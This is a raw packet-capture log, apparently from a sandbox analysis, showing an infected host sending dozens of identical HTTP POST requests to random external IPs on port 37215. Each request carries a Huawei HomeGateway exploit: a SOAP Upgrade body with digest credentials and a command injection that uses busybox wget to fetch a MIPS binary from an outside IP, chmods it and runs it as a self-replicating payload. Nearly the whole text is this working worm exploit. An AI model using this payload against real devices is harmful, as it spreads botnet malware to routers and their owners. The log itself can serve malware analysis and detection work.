                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2299192.168.2.1354182109.112.167.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.621454954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2300192.168.2.1344570209.11.76.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.621578932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2301192.168.2.1360740197.67.6.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.621582985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2302192.168.2.1342546157.72.135.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.621659994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2303192.168.2.1334936206.140.168.24237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.621750116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2304192.168.2.1353784157.87.167.7637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.621761084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2305192.168.2.1338680100.181.60.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.621829987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2306192.168.2.136031041.208.122.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.621836901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2307192.168.2.1360398149.57.175.13237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.621933937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2308192.168.2.1336664160.129.218.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.621943951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
